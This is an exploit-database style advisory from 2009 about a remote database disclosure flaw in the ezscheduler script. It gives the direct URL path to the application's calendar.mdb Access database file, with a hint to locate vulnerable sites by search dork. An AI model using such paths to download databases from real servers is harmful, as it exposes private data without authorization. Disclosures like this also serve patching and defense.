id: 10529
date: 12/30/2009
title: ezscheduler Remote Database Disclosure Vulnerability
author: RENO
cves: 

====================================================
ezscheduler Remote Database Disclosure Vulnerability
====================================================

#####################################################
 # [+] Dork : search for it :p                       #
 # [+] Script : ezscheduler                          #
 #####################################################
 
vuln. in :
 
http://server/path/datastores/calendar.mdb
 
 
good luck :D



#  0day.today [2023-03-22]  #